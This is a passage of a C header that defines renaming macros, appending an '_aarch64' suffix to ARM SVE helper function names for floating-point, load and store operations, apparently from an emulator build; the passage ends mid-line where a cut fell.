#define helper_sve_brkbs_m helper_sve_brkbs_m_aarch64 #define helper_sve_brkn helper_sve_brkn_aarch64 #define helper_sve_brkns helper_sve_brkns_aarch64 #define helper_sve_cntp helper_sve_cntp_aarch64 #define helper_sve_while helper_sve_while_aarch64 #define helper_sve_faddv_h helper_sve_faddv_h_aarch64 #define helper_sve_faddv_s helper_sve_faddv_s_aarch64 #define helper_sve_faddv_d helper_sve_faddv_d_aarch64 #define helper_sve_fminnmv_h helper_sve_fminnmv_h_aarch64 #define helper_sve_fminnmv_s helper_sve_fminnmv_s_aarch64 #define helper_sve_fminnmv_d helper_sve_fminnmv_d_aarch64 #define helper_sve_fmaxnmv_h helper_sve_fmaxnmv_h_aarch64 #define helper_sve_fmaxnmv_s helper_sve_fmaxnmv_s_aarch64 #define helper_sve_fmaxnmv_d helper_sve_fmaxnmv_d_aarch64 #define helper_sve_fminv_h helper_sve_fminv_h_aarch64 #define helper_sve_fminv_s helper_sve_fminv_s_aarch64 #define helper_sve_fminv_d helper_sve_fminv_d_aarch64 #define helper_sve_fmaxv_h helper_sve_fmaxv_h_aarch64 #define helper_sve_fmaxv_s helper_sve_fmaxv_s_aarch64 #define helper_sve_fmaxv_d helper_sve_fmaxv_d_aarch64 #define helper_sve_fadda_h helper_sve_fadda_h_aarch64 #define helper_sve_fadda_s helper_sve_fadda_s_aarch64 #define helper_sve_fadda_d helper_sve_fadda_d_aarch64 #define helper_sve_fadd_h helper_sve_fadd_h_aarch64 #define helper_sve_fadd_s helper_sve_fadd_s_aarch64 #define helper_sve_fadd_d helper_sve_fadd_d_aarch64 #define helper_sve_fsub_h helper_sve_fsub_h_aarch64 #define helper_sve_fsub_s helper_sve_fsub_s_aarch64 #define helper_sve_fsub_d helper_sve_fsub_d_aarch64 #define helper_sve_fmul_h helper_sve_fmul_h_aarch64 #define helper_sve_fmul_s helper_sve_fmul_s_aarch64 #define helper_sve_fmul_d helper_sve_fmul_d_aarch64 #define helper_sve_fdiv_h helper_sve_fdiv_h_aarch64 #define helper_sve_fdiv_s helper_sve_fdiv_s_aarch64 #define helper_sve_fdiv_d helper_sve_fdiv_d_aarch64 #define helper_sve_fmin_h helper_sve_fmin_h_aarch64 #define helper_sve_fmin_s helper_sve_fmin_s_aarch64 #define helper_sve_fmin_d helper_sve_fmin_d_aarch64 #define helper_sve_fmax_h helper_sve_fmax_h_aarch64 #define helper_sve_fmax_s helper_sve_fmax_s_aarch64 #define helper_sve_fmax_d helper_sve_fmax_d_aarch64 #define helper_sve_fminnum_h helper_sve_fminnum_h_aarch64 #define helper_sve_fminnum_s helper_sve_fminnum_s_aarch64 #define helper_sve_fminnum_d helper_sve_fminnum_d_aarch64 #define helper_sve_fmaxnum_h helper_sve_fmaxnum_h_aarch64 #define helper_sve_fmaxnum_s helper_sve_fmaxnum_s_aarch64 #define helper_sve_fmaxnum_d helper_sve_fmaxnum_d_aarch64 #define helper_sve_fabd_h helper_sve_fabd_h_aarch64 #define helper_sve_fabd_s helper_sve_fabd_s_aarch64 #define helper_sve_fabd_d helper_sve_fabd_d_aarch64 #define helper_sve_fscalbn_h helper_sve_fscalbn_h_aarch64 #define helper_sve_fscalbn_s helper_sve_fscalbn_s_aarch64 #define helper_sve_fscalbn_d helper_sve_fscalbn_d_aarch64 #define helper_sve_fmulx_h helper_sve_fmulx_h_aarch64 #define helper_sve_fmulx_s helper_sve_fmulx_s_aarch64 #define helper_sve_fmulx_d helper_sve_fmulx_d_aarch64 #define helper_sve_fadds_h helper_sve_fadds_h_aarch64 #define helper_sve_fadds_s helper_sve_fadds_s_aarch64 #define helper_sve_fadds_d helper_sve_fadds_d_aarch64 #define helper_sve_fsubs_h helper_sve_fsubs_h_aarch64 #define helper_sve_fsubs_s helper_sve_fsubs_s_aarch64 #define helper_sve_fsubs_d helper_sve_fsubs_d_aarch64 #define helper_sve_fmuls_h helper_sve_fmuls_h_aarch64 #define helper_sve_fmuls_s helper_sve_fmuls_s_aarch64 #define helper_sve_fmuls_d helper_sve_fmuls_d_aarch64 #define helper_sve_fsubrs_h helper_sve_fsubrs_h_aarch64 #define helper_sve_fsubrs_s helper_sve_fsubrs_s_aarch64 #define helper_sve_fsubrs_d helper_sve_fsubrs_d_aarch64 #define helper_sve_fmaxnms_h helper_sve_fmaxnms_h_aarch64 #define helper_sve_fmaxnms_s helper_sve_fmaxnms_s_aarch64 #define helper_sve_fmaxnms_d helper_sve_fmaxnms_d_aarch64 #define helper_sve_fminnms_h helper_sve_fminnms_h_aarch64 #define helper_sve_fminnms_s helper_sve_fminnms_s_aarch64 #define helper_sve_fminnms_d helper_sve_fminnms_d_aarch64 #define helper_sve_fmaxs_h helper_sve_fmaxs_h_aarch64 #define helper_sve_fmaxs_s helper_sve_fmaxs_s_aarch64 #define helper_sve_fmaxs_d helper_sve_fmaxs_d_aarch64 #define helper_sve_fmins_h helper_sve_fmins_h_aarch64 #define helper_sve_fmins_s helper_sve_fmins_s_aarch64 #define helper_sve_fmins_d helper_sve_fmins_d_aarch64 #define helper_sve_fcvt_sh helper_sve_fcvt_sh_aarch64 #define helper_sve_fcvt_hs helper_sve_fcvt_hs_aarch64 #define helper_sve_fcvt_dh helper_sve_fcvt_dh_aarch64 #define helper_sve_fcvt_hd helper_sve_fcvt_hd_aarch64 #define helper_sve_fcvt_ds helper_sve_fcvt_ds_aarch64 #define helper_sve_fcvt_sd helper_sve_fcvt_sd_aarch64 #define helper_sve_fcvtzs_hh helper_sve_fcvtzs_hh_aarch64 #define helper_sve_fcvtzs_hs helper_sve_fcvtzs_hs_aarch64 #define helper_sve_fcvtzs_ss helper_sve_fcvtzs_ss_aarch64 #define helper_sve_fcvtzs_hd helper_sve_fcvtzs_hd_aarch64 #define helper_sve_fcvtzs_sd helper_sve_fcvtzs_sd_aarch64 #define helper_sve_fcvtzs_ds helper_sve_fcvtzs_ds_aarch64 #define helper_sve_fcvtzs_dd helper_sve_fcvtzs_dd_aarch64 #define helper_sve_fcvtzu_hh helper_sve_fcvtzu_hh_aarch64 #define helper_sve_fcvtzu_hs helper_sve_fcvtzu_hs_aarch64 #define helper_sve_fcvtzu_ss helper_sve_fcvtzu_ss_aarch64 #define helper_sve_fcvtzu_hd helper_sve_fcvtzu_hd_aarch64 #define helper_sve_fcvtzu_sd helper_sve_fcvtzu_sd_aarch64 #define helper_sve_fcvtzu_ds helper_sve_fcvtzu_ds_aarch64 #define helper_sve_fcvtzu_dd helper_sve_fcvtzu_dd_aarch64 #define helper_sve_frint_h helper_sve_frint_h_aarch64 #define helper_sve_frint_s helper_sve_frint_s_aarch64 #define helper_sve_frint_d helper_sve_frint_d_aarch64 #define helper_sve_frintx_h helper_sve_frintx_h_aarch64 #define helper_sve_frintx_s helper_sve_frintx_s_aarch64 #define helper_sve_frintx_d helper_sve_frintx_d_aarch64 #define helper_sve_frecpx_h helper_sve_frecpx_h_aarch64 #define helper_sve_frecpx_s helper_sve_frecpx_s_aarch64 #define helper_sve_frecpx_d helper_sve_frecpx_d_aarch64 #define helper_sve_fsqrt_h helper_sve_fsqrt_h_aarch64 #define helper_sve_fsqrt_s helper_sve_fsqrt_s_aarch64 #define helper_sve_fsqrt_d helper_sve_fsqrt_d_aarch64 #define helper_sve_scvt_hh helper_sve_scvt_hh_aarch64 #define helper_sve_scvt_sh helper_sve_scvt_sh_aarch64 #define helper_sve_scvt_ss helper_sve_scvt_ss_aarch64 #define helper_sve_scvt_sd helper_sve_scvt_sd_aarch64 #define helper_sve_scvt_dh helper_sve_scvt_dh_aarch64 #define helper_sve_scvt_ds helper_sve_scvt_ds_aarch64 #define helper_sve_scvt_dd helper_sve_scvt_dd_aarch64 #define helper_sve_ucvt_hh helper_sve_ucvt_hh_aarch64 #define helper_sve_ucvt_sh helper_sve_ucvt_sh_aarch64 #define helper_sve_ucvt_ss helper_sve_ucvt_ss_aarch64 #define helper_sve_ucvt_sd helper_sve_ucvt_sd_aarch64 #define helper_sve_ucvt_dh helper_sve_ucvt_dh_aarch64 #define helper_sve_ucvt_ds helper_sve_ucvt_ds_aarch64 #define helper_sve_ucvt_dd helper_sve_ucvt_dd_aarch64 #define helper_sve_fmla_zpzzz_h helper_sve_fmla_zpzzz_h_aarch64 #define helper_sve_fmls_zpzzz_h helper_sve_fmls_zpzzz_h_aarch64 #define helper_sve_fnmla_zpzzz_h helper_sve_fnmla_zpzzz_h_aarch64 #define helper_sve_fnmls_zpzzz_h helper_sve_fnmls_zpzzz_h_aarch64 #define helper_sve_fmla_zpzzz_s helper_sve_fmla_zpzzz_s_aarch64 #define helper_sve_fmls_zpzzz_s helper_sve_fmls_zpzzz_s_aarch64 #define helper_sve_fnmla_zpzzz_s helper_sve_fnmla_zpzzz_s_aarch64 #define helper_sve_fnmls_zpzzz_s helper_sve_fnmls_zpzzz_s_aarch64 #define helper_sve_fmla_zpzzz_d helper_sve_fmla_zpzzz_d_aarch64 #define helper_sve_fmls_zpzzz_d helper_sve_fmls_zpzzz_d_aarch64 #define helper_sve_fnmla_zpzzz_d helper_sve_fnmla_zpzzz_d_aarch64 #define helper_sve_fnmls_zpzzz_d helper_sve_fnmls_zpzzz_d_aarch64 #define helper_sve_fcmge_h helper_sve_fcmge_h_aarch64 #define helper_sve_fcmge_s helper_sve_fcmge_s_aarch64 #define helper_sve_fcmge_d helper_sve_fcmge_d_aarch64 #define helper_sve_fcmgt_h helper_sve_fcmgt_h_aarch64 #define helper_sve_fcmgt_s helper_sve_fcmgt_s_aarch64 #define helper_sve_fcmgt_d helper_sve_fcmgt_d_aarch64 #define helper_sve_fcmeq_h helper_sve_fcmeq_h_aarch64 #define helper_sve_fcmeq_s helper_sve_fcmeq_s_aarch64 #define helper_sve_fcmeq_d helper_sve_fcmeq_d_aarch64 #define helper_sve_fcmne_h helper_sve_fcmne_h_aarch64 #define helper_sve_fcmne_s helper_sve_fcmne_s_aarch64 #define helper_sve_fcmne_d helper_sve_fcmne_d_aarch64 #define helper_sve_fcmuo_h helper_sve_fcmuo_h_aarch64 #define helper_sve_fcmuo_s helper_sve_fcmuo_s_aarch64 #define helper_sve_fcmuo_d helper_sve_fcmuo_d_aarch64 #define helper_sve_facge_h helper_sve_facge_h_aarch64 #define helper_sve_facge_s helper_sve_facge_s_aarch64 #define helper_sve_facge_d helper_sve_facge_d_aarch64 #define helper_sve_facgt_h helper_sve_facgt_h_aarch64 #define helper_sve_facgt_s helper_sve_facgt_s_aarch64 #define helper_sve_facgt_d helper_sve_facgt_d_aarch64 #define helper_sve_fcmge0_h helper_sve_fcmge0_h_aarch64 #define helper_sve_fcmge0_s helper_sve_fcmge0_s_aarch64 #define helper_sve_fcmge0_d helper_sve_fcmge0_d_aarch64 #define helper_sve_fcmgt0_h helper_sve_fcmgt0_h_aarch64 #define helper_sve_fcmgt0_s helper_sve_fcmgt0_s_aarch64 #define helper_sve_fcmgt0_d helper_sve_fcmgt0_d_aarch64 #define helper_sve_fcmle0_h helper_sve_fcmle0_h_aarch64 #define helper_sve_fcmle0_s helper_sve_fcmle0_s_aarch64 #define helper_sve_fcmle0_d helper_sve_fcmle0_d_aarch64 #define helper_sve_fcmlt0_h helper_sve_fcmlt0_h_aarch64 #define helper_sve_fcmlt0_s helper_sve_fcmlt0_s_aarch64 #define helper_sve_fcmlt0_d helper_sve_fcmlt0_d_aarch64 #define helper_sve_fcmeq0_h helper_sve_fcmeq0_h_aarch64 #define helper_sve_fcmeq0_s helper_sve_fcmeq0_s_aarch64 #define helper_sve_fcmeq0_d helper_sve_fcmeq0_d_aarch64 #define helper_sve_fcmne0_h helper_sve_fcmne0_h_aarch64 #define helper_sve_fcmne0_s helper_sve_fcmne0_s_aarch64 #define helper_sve_fcmne0_d helper_sve_fcmne0_d_aarch64 #define helper_sve_ftmad_h helper_sve_ftmad_h_aarch64 #define helper_sve_ftmad_s helper_sve_ftmad_s_aarch64 #define helper_sve_ftmad_d helper_sve_ftmad_d_aarch64 #define helper_sve_fcadd_h helper_sve_fcadd_h_aarch64 #define helper_sve_fcadd_s helper_sve_fcadd_s_aarch64 #define helper_sve_fcadd_d helper_sve_fcadd_d_aarch64 #define helper_sve_fcmla_zpzzz_h helper_sve_fcmla_zpzzz_h_aarch64 #define helper_sve_fcmla_zpzzz_s helper_sve_fcmla_zpzzz_s_aarch64 #define helper_sve_fcmla_zpzzz_d helper_sve_fcmla_zpzzz_d_aarch64 #define helper_sve_ld1bb_r helper_sve_ld1bb_r_aarch64 #define helper_sve_ld1bhu_r helper_sve_ld1bhu_r_aarch64 #define helper_sve_ld1bhs_r helper_sve_ld1bhs_r_aarch64 #define helper_sve_ld1bsu_r helper_sve_ld1bsu_r_aarch64 #define helper_sve_ld1bss_r helper_sve_ld1bss_r_aarch64 #define helper_sve_ld1bdu_r helper_sve_ld1bdu_r_aarch64 #define helper_sve_ld1bds_r helper_sve_ld1bds_r_aarch64 #define helper_sve_ld1hh_le_r helper_sve_ld1hh_le_r_aarch64 #define helper_sve_ld1hh_be_r helper_sve_ld1hh_be_r_aarch64 #define helper_sve_ld1hsu_le_r helper_sve_ld1hsu_le_r_aarch64 #define helper_sve_ld1hsu_be_r helper_sve_ld1hsu_be_r_aarch64 #define helper_sve_ld1hss_le_r helper_sve_ld1hss_le_r_aarch64 #define helper_sve_ld1hss_be_r helper_sve_ld1hss_be_r_aarch64 #define helper_sve_ld1hdu_le_r helper_sve_ld1hdu_le_r_aarch64 #define helper_sve_ld1hdu_be_r helper_sve_ld1hdu_be_r_aarch64 #define helper_sve_ld1hds_le_r helper_sve_ld1hds_le_r_aarch64 #define helper_sve_ld1hds_be_r helper_sve_ld1hds_be_r_aarch64 #define helper_sve_ld1ss_le_r helper_sve_ld1ss_le_r_aarch64 #define helper_sve_ld1ss_be_r helper_sve_ld1ss_be_r_aarch64 #define helper_sve_ld1sdu_le_r helper_sve_ld1sdu_le_r_aarch64 #define helper_sve_ld1sdu_be_r helper_sve_ld1sdu_be_r_aarch64 #define helper_sve_ld1sds_le_r helper_sve_ld1sds_le_r_aarch64 #define helper_sve_ld1sds_be_r helper_sve_ld1sds_be_r_aarch64 #define helper_sve_ld1dd_le_r helper_sve_ld1dd_le_r_aarch64 #define helper_sve_ld1dd_be_r helper_sve_ld1dd_be_r_aarch64 #define helper_sve_ld2bb_r helper_sve_ld2bb_r_aarch64 #define helper_sve_ld3bb_r helper_sve_ld3bb_r_aarch64 #define helper_sve_ld4bb_r helper_sve_ld4bb_r_aarch64 #define helper_sve_ld2hh_le_r helper_sve_ld2hh_le_r_aarch64 #define helper_sve_ld2hh_be_r helper_sve_ld2hh_be_r_aarch64 #define helper_sve_ld3hh_le_r helper_sve_ld3hh_le_r_aarch64 #define helper_sve_ld3hh_be_r helper_sve_ld3hh_be_r_aarch64 #define helper_sve_ld4hh_le_r helper_sve_ld4hh_le_r_aarch64 #define helper_sve_ld4hh_be_r helper_sve_ld4hh_be_r_aarch64 #define helper_sve_ld2ss_le_r helper_sve_ld2ss_le_r_aarch64 #define helper_sve_ld2ss_be_r helper_sve_ld2ss_be_r_aarch64 #define helper_sve_ld3ss_le_r helper_sve_ld3ss_le_r_aarch64 #define helper_sve_ld3ss_be_r helper_sve_ld3ss_be_r_aarch64 #define helper_sve_ld4ss_le_r helper_sve_ld4ss_le_r_aarch64 #define helper_sve_ld4ss_be_r helper_sve_ld4ss_be_r_aarch64 #define helper_sve_ld2dd_le_r helper_sve_ld2dd_le_r_aarch64 #define helper_sve_ld2dd_be_r helper_sve_ld2dd_be_r_aarch64 #define helper_sve_ld3dd_le_r helper_sve_ld3dd_le_r_aarch64 #define helper_sve_ld3dd_be_r helper_sve_ld3dd_be_r_aarch64 #define helper_sve_ld4dd_le_r helper_sve_ld4dd_le_r_aarch64 #define helper_sve_ld4dd_be_r helper_sve_ld4dd_be_r_aarch64 #define helper_sve_ldff1bb_r helper_sve_ldff1bb_r_aarch64 #define helper_sve_ldnf1bb_r helper_sve_ldnf1bb_r_aarch64 #define helper_sve_ldff1bhu_r helper_sve_ldff1bhu_r_aarch64 #define helper_sve_ldnf1bhu_r helper_sve_ldnf1bhu_r_aarch64 #define helper_sve_ldff1bhs_r helper_sve_ldff1bhs_r_aarch64 #define helper_sve_ldnf1bhs_r helper_sve_ldnf1bhs_r_aarch64 #define helper_sve_ldff1bsu_r helper_sve_ldff1bsu_r_aarch64 #define helper_sve_ldnf1bsu_r helper_sve_ldnf1bsu_r_aarch64 #define helper_sve_ldff1bss_r helper_sve_ldff1bss_r_aarch64 #define helper_sve_ldnf1bss_r helper_sve_ldnf1bss_r_aarch64 #define helper_sve_ldff1bdu_r helper_sve_ldff1bdu_r_aarch64 #define helper_sve_ldnf1bdu_r helper_sve_ldnf1bdu_r_aarch64 #define helper_sve_ldff1bds_r helper_sve_ldff1bds_r_aarch64 #define helper_sve_ldnf1bds_r helper_sve_ldnf1bds_r_aarch64 #define helper_sve_ldff1hh_le_r helper_sve_ldff1hh_le_r_aarch64 #define helper_sve_ldnf1hh_le_r helper_sve_ldnf1hh_le_r_aarch64 #define helper_sve_ldff1hh_be_r helper_sve_ldff1hh_be_r_aarch64 #define helper_sve_ldnf1hh_be_r helper_sve_ldnf1hh_be_r_aarch64 #define helper_sve_ldff1hsu_le_r helper_sve_ldff1hsu_le_r_aarch64 #define helper_sve_ldnf1hsu_le_r helper_sve_ldnf1hsu_le_r_aarch64 #define helper_sve_ldff1hsu_be_r helper_sve_ldff1hsu_be_r_aarch64 #define helper_sve_ldnf1hsu_be_r helper_sve_ldnf1hsu_be_r_aarch64 #define helper_sve_ldff1hss_le_r helper_sve_ldff1hss_le_r_aarch64 #define helper_sve_ldnf1hss_le_r helper_sve_ldnf1hss_le_r_aarch64 #define helper_sve_ldff1hss_be_r helper_sve_ldff1hss_be_r_aarch64 #define helper_sve_ldnf1hss_be_r helper_sve_ldnf1hss_be_r_aarch64 #define helper_sve_ldff1hdu_le_r helper_sve_ldff1hdu_le_r_aarch64 #define helper_sve_ldnf1hdu_le_r helper_sve_ldnf1hdu_le_r_aarch64 #define helper_sve_ldff1hdu_be_r helper_sve_ldff1hdu_be_r_aarch64 #define helper_sve_ldnf1hdu_be_r helper_sve_ldnf1hdu_be_r_aarch64 #define helper_sve_ldff1hds_le_r helper_sve_ldff1hds_le_r_aarch64 #define helper_sve_ldnf1hds_le_r helper_sve_ldnf1hds_le_r_aarch64 #define helper_sve_ldff1hds_be_r helper_sve_ldff1hds_be_r_aarch64 #define helper_sve_ldnf1hds_be_r helper_sve_ldnf1hds_be_r_aarch64 #define helper_sve_ldff1ss_le_r helper_sve_ldff1ss_le_r_aarch64 #define helper_sve_ldnf1ss_le_r helper_sve_ldnf1ss_le_r_aarch64 #define helper_sve_ldff1ss_be_r helper_sve_ldff1ss_be_r_aarch64 #define helper_sve_ldnf1ss_be_r helper_sve_ldnf1ss_be_r_aarch64 #define helper_sve_ldff1sdu_le_r helper_sve_ldff1sdu_le_r_aarch64 #define helper_sve_ldnf1sdu_le_r helper_sve_ldnf1sdu_le_r_aarch64 #define helper_sve_ldff1sdu_be_r helper_sve_ldff1sdu_be_r_aarch64 #define helper_sve_ldnf1sdu_be_r helper_sve_ldnf1sdu_be_r_aarch64 #define helper_sve_ldff1sds_le_r helper_sve_ldff1sds_le_r_aarch64 #define helper_sve_ldnf1sds_le_r helper_sve_ldnf1sds_le_r_aarch64 #define helper_sve_ldff1sds_be_r helper_sve_ldff1sds_be_r_aarch64 #define helper_sve_ldnf1sds_be_r helper_sve_ldnf1sds_be_r_aarch64 #define helper_sve_ldff1dd_le_r helper_sve_ldff1dd_le_r_aarch64 #define helper_sve_ldnf1dd_le_r helper_sve_ldnf1dd_le_r_aarch64 #define helper_sve_ldff1dd_be_r helper_sve_ldff1dd_be_r_aarch64 #define helper_sve_ldnf1dd_be_r helper_sve_ldnf1dd_be_r_aarch64 #define helper_sve_st1bb_r helper_sve_st1bb_r_aarch64 #define helper_sve_st1bh_r helper_sve_st1bh_r_aarch64 #define helper_sve_st1bs_r helper_sve_st1bs_r_aarch64 #define helper_sve_st1bd_r helper_sve_st1bd_r_aarch64 #define helper_sve_st2bb_r helper_sve_st2bb_r_aarch64 #define helper_sve_st3bb_r helper_sve_st3bb_r_aarch64 #define helper_sve_st4bb_r helper_sve_st4bb_r_aarch64 #define helper_sve_st1hh_le_r helper_sve_st1hh_le_r_aarch64 #define helper_sve_st1hh_be_r helper_sve_st1hh_be_r_aarch64 #define helper_sve_st1hs_le_r helper_sve_st1hs_le_r_aarch64 #define helper_sve_st1hs_be_r helper_sve_st1hs_be_r_aarch64 #define helper_sve_st1hd_le_r helper_sve_st1hd_le_r_aarch64 #define helper_sve_st1hd_be_r helper_sve_st1hd_be_r_aarch64 #define helper_sve_st2hh_le_r helper_sve_st2hh_le_r_aarch64 #define helper_sve_st2hh_be_r helper_sve_st2hh_be_r_aarch64 #define helper_sve_st3hh_le_r helper_sve_st3hh_le_r_aarch64 #define helper_sve_st3hh_be_r helper_sve_st3hh_be_r_aarch64 #define helper_sve_st4hh_le_r helper_sve_st4hh_le_r_aarch64 #define helper_sve_st4hh_be_r helper_sve_st4hh_be_r_aarch64 #define helper_sve_st1ss_le_r helper_sve_st1ss_le_r_aarch64 #define helper_sve_st1ss_be_r helper_sve_st1ss_be_r_aarch64 #define helper_sve_st1sd_le_r helper_sve_st1sd_le_r_aarch64 #define helper_sve_st1sd_be_r helper_sve_st1sd_be_r_aarch64 #define helper_sve_st2ss_le_r helper_sve_st2ss_le_r_aarch64 #define helper_sve_st2ss_be_r helper_sve_st2ss_be_r_aarch64 #define helper_sve_st3ss_le_r helper_sve_st3ss_le_r_aarch64 #define helper_sve_st3ss_be_r helper_sve_st3ss_be_r_aarch64 #define helper_sve_st4ss_le_r helper_sve_st4ss_le_r_aarch64 #define helper_sve_st4ss_be_r helper_sve_st4ss_be_r_aarch64 #define helper_sve_st1dd_le_r helper_sve_st1dd_le_r_aarch64 #define helper_sve_st1dd_be_r helper_sve_st1dd_be_r_aarch64 #define helper_sve_st2dd_le_r helper_sve_st2dd_le_r_aarch64 #define helper_sve_st2dd_be_r helper_sve_st2dd_be_r_aarch64 #define helper_sve_st3dd_le_r helper_sve_st3dd_le_r_aarch64 #define helper_sve_st3dd_be_r helper_sve_st3dd_be_r_aarch64 #define helper_sve_st4dd_le_r helper_sve_st4dd_le_r_aarch64 #define helper_sve_st4dd_be_r helper_sve_st4dd_be_r_aarch64 #define helper_sve_ldbsu_zsu helper_sve_ldbsu_zsu_aarch64 #define helper_sve_ldbsu_zss helper_sve_ldbsu_zss_aarch64 #define helper_sve_ldbdu_zsu helper_sve_ldbdu_zsu_aarch64 #define helper_sve_ldbdu_zss helper_sve_ldbdu_zss_aarch64 #define helper_sve_ldbdu_zd helper_sve_ldbdu_zd_aarch64 #define helper_sve_ldbss_zsu helper_sve_ldbss_zsu_aarch64 #define helper_sve_ldbss_zss helper_sve_ldbss_zss_aarch64 #define helper_sve_ldbds_zsu helper_sve_ldbds_zsu_aarch64 #define helper_sve_ldbds_zss helper_sve_ldbds_zss_aarch64 #define helper_sve_ldbds_zd helper_sve_ldbds_zd_aarch64 #define helper_sve_ldhsu_le_zsu helper_sve_ldhsu_le_zsu_aarch64 #define helper_sve_ldhsu_le_zss helper_sve_ldhsu_le_zss_aarch64 #define helper_sve_ldhdu_le_zsu helper_sve_ldhdu_le_zsu_aarch64 #define helper_sve_ldhdu_le_zss helper_sve_ldhdu_le_zss_aarch64 #define helper_sve_ldhdu_le_zd helper_sve_ldhdu_le_zd_aarch64 #define helper_sve_ldhsu_be_zsu helper_sve_ldhsu_be_zsu_aarch64 #define helper_sve_ldhsu_be_zss helper_sve_ldhsu_be_zss_aarch64 #define helper_sve_ldhdu_be_zsu helper_sve_ldhdu_be_zsu_aarch64 #define helper_sve_ldhdu_be_zss helper_sve_ldhdu_be_zss_aarch64 #define helper_sve_ldhdu_be_zd helper_sve_ldhdu_be_zd_aarch64 #define helper_sve_ldhss_le_zsu helper_sve_ldhss_le_zsu_aarch64 #define helper_sve_ldhss_le_zss helper_sve_ldhss_le_zss_aarch64 #define helper_sve_ldhds_le_zsu helper_sve_ldhds_le_zsu_aarch64 #define helper_sve_ldhds_le_zss helper_sve_ldhds_le_zss_aarch64 #define helper_sve_ldhds_le_zd helper_sve_ldhds_le_zd_aarch64 #define helper_sve_ldhss_be_zsu helper_sve_ldhss_be_zsu_aarch64 #define helper_sve_ldhss_be_zss helper_sve_ldhss_be_zss_aarch64 #define helper_sve_ldhds_be_zsu helper_sve_ldhds_be_zsu_aarch64 #define helper_sve_ldhds_be_zss helper_sve_ldhds_be_zss_aarch64 #define helper_sve_ldhds_be_zd helper_sve_ldhds_be_zd_aarch64 #define helper_sve_ldss_le_zsu helper_sve_ldss_le_zsu_aarch64 #define helper_sve_ldss_le_zss helper_sve_ldss_le_zss_aarch64 #define helper_sve_ldsdu_le_zsu helper_sve_ldsdu_le_zsu_aarch64 #define helper_sve_ldsdu_le_zss helper_sve_ldsdu_le_zss_aarch64 #define helper_sve_ldsdu_le_zd helper_sve_ldsdu_le_zd_aarch64 #define helper_sve_ldss_be_zsu helper_sve_ldss_be_zsu_aarch64 #define helper_sve_ldss_be_zss helper_sve_ldss_be_zss_aarch64 #define helper_sve_ldsdu_be_zsu helper_sve_ldsdu_be_zsu_aarch64 #define helper_sve_ldsdu_be_zss helper_sve_ldsdu_be_zss_aarch64 #define helper_sve_ldsdu_be_zd helper_sve_ldsdu_be_zd_aarch64 #define helper_sve_ldsds_le_zsu helper_sve_ldsds_le_zsu_aarch64 #define helper_sve_ldsds_le_zss helper_sve_ldsds_le_zss_aarch64 #define helper_sve_ldsds_le_zd helper_sve_ldsds_le_zd_aarch64 #define helper_sve_ldsds_be_zsu helper_sve_ldsds_be_zsu_aarch64 #define helper_sve_ldsds_be_zss helper_sve_ldsds_be_zss_aarch64 #define helper_sve_ldsds_be_zd helper_sve_ldsds_be_zd_aarch64 #define helper_sve_lddd_le_zsu helper_sve_lddd_le_zsu_aarch64 #define helper_sve_lddd_le_zss helper_sve_lddd_le_zss_aarch64 #define helper_sve_lddd_le_zd helper_sve_lddd_le_zd_aarch64 #define helper_sve_lddd_be_zsu helper_sve_lddd_be_zsu_aarch64 #define helper_sve_lddd_be_zss helper_sve_lddd_be_zss_aarch64 #define helper_sve_lddd_be_zd helper_sve_lddd_be_zd_aarch64 #define helper_sve_ldffbsu_zsu helper_sve_ldffbsu_zsu_aarch64 #define helper_sve_ldffbsu_zss helper_sve_ldffbsu_zss_aarch64 #define helper_sve_ldffbdu_zsu helper_sve_ldffbdu_zsu_aarch64 #define helper_sve_ldffbdu_zss helper_sve_ldffbdu_zss_aarch64 #define helper_sve_ldffbdu_zd helper_sve_ldffbdu_zd_aarch64 #define helper_sve_ldffbss_zsu helper_sve_ldffbss_zsu_aarch64 #define helper_sve_ldffbss_zss helper_sve_ldffbss_zss_aarch64 #define helper_sve_ldffbds_zsu helper_sve_ldffbds_zsu_aarch64 #define helper_sve_ldffbds_zss helper_sve_ldffbds_zss_aarch64 #define helper_sve_ldffbds_zd helper_sve_ldffbds_zd_aarch64 #define helper_sve_ldffhsu_le_zsu helper_sve_ldffhsu_le_zsu_aarch64 #define helper_sve_ldffhsu_le_zss helper_sve_ldffhsu_le_zss_aarch64 #define helper_sve_ldffhdu_le_zsu helper_sve_ldffhdu_le_zsu_aarch64 #define helper_sve_ldffhdu_le_zss helper_sve_ldffhdu_le_zss_aarch64 #define helper_sve_ldffhdu_le_zd helper_sve_ldffhdu_le_zd_aarch64 #define helper_sve_ldffhsu_be_zsu helper_sve_ldffhsu_be_zsu_aarch64 #define helper_sve_ldffhsu_be_zss helper_sve_ldffhsu_be_zss_aarch64 #define helper_sve_ldffhdu_be_zsu helper_sve_ldffhdu_be_zsu_aarch64 #define helper_sve_ldffhdu_be_zss helper_sve_ldffhdu_be_zss_aarch64 #define helper_sve_ldffhdu_be_zd helper_sve_ldffhdu_be_zd_aarch64 #define helper_sve_ldffhss_le_zsu helper_sve_ldffhss_le_zsu_aarch64 #define helper_sve_ldffhss_le_zss helper_sve_ldffhss_le_zss_aarch64 #define helper_sve_ldffhds_le_zsu helper_sve_ldffhds_le_zsu_aarch64 #define helper_sve_ldffhds_le_zss helper_sve_ldffhds_le_zss_aarch64 #define helper_sve_ldffhds_le_zd helper_sve_ldffhds_le_zd_aarch64 #define helper_sve_ldffhss_be_zsu helper_sve_ldffhss_be_zsu_aarch64 #define helper_sve_ldffhss_be_zss helper_sve_ldffhss_be_zss_aarch64 #define helper_sve_ldffhds_be_zsu helper_sve_ldffhds_be_zsu_aarch64 #define helper_sve_ldffhds_be_zss helper_sve_ldffhds_be_zss_aarch64 #define helper_sve_ldffhds_be_zd helper_sve_ldffhds_be_zd_aarch64 #define helper_sve_ldffss_le_zsu helper_sve_ldffss_le_zsu_aarch64 #define helper_sve_ldffss_le_zss helper_sve_ldffss_le_zss_aarch64 #define helper_sve_ldffsdu_le_zsu helper_sve_ldffsdu_le_zsu_aarch64 #define helper_sve_ldffsdu_le_zss helper_sve_ldffsdu_le_zss_aarch64 #define helper_sve_ldffsdu_le_zd helper_sve_ldffsdu_le_zd_aarch64 #define helper_sve_ldffss_be_zsu helper_sve_ldffss_be_zsu_aarch64 #define helper_sve_ldffss_be_zss helper_sve_ldffss_be_zss_aarch64 #define helper_sve_ldffsdu_be_zsu helper_sve_ldffsdu_be_zsu_aarch64 #define helper_sve_ldffsdu_be_zss helper_sve_ldffsdu_be_zss_aarch64 #define helper_sve_ldffsdu_be_zd helper_sve_ldffsdu_be_zd_aarch64 #define helper_sve_ldffsds_le_zsu helper_sve_ldffsds_le_zsu_aarch64 #define 